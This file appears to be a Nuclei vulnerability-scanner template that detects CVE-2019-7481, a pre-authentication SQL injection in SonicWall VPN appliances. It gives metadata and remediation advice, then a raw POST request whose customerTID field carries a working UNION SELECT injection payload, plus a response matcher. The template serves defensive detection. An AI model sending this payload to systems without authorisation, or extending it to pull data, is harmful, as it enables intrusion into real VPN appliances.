nuclei-templates/http/cves/2019/CVE-2019-7481.yaml

46 lines
1.7 KiB
YAML

id: CVE-2019-7481
info:
name: SonicWall SRA 4600 VPN - SQL Injection
author: _darrenmartyn
severity: high
description: The SonicWall SRA 4600 VPN appliance is susceptible to a pre-authentication SQL injection vulnerability.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL commands, potentially leading to unauthorized access, data leakage, or denial of service.
remediation: |
Apply the latest security patches or firmware updates provided by SonicWall to mitigate this vulnerability.
reference:
- https://www.crowdstrike.com/blog/how-ecrime-groups-leverage-sonicwall-vulnerability-cve-2019-7481/
- https://nvd.nist.gov/vuln/detail/CVE-2019-7481
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0016
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-7481
cwe-id: CWE-89
epss-score: 0.88397
epss-percentile: 0.984
cpe: cpe:2.3:o:sonicwall:sma_100_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: sonicwall
product: sma_100_firmware
tags: cve,cve2019,sonicwall,sqli,kev
http:
- raw:
- |
POST /cgi-bin/supportInstaller HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: identity
User-Agent: MSIE
Content-Type: application/x-www-form-urlencoded
fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0--
matchers:
- type: word
part: body
words:
- "4220397236"
# digest: 4b0a00483046022100938634ada011c2675a1b1cb8a2cd165c9838c6488928e284f5bc0de98adc14c3022100f0754c051e3b5da2822a2dbee7428cd46384746cd20dcf657d417c4ff36fea63:922c64590222798bb761d5b6d8e72950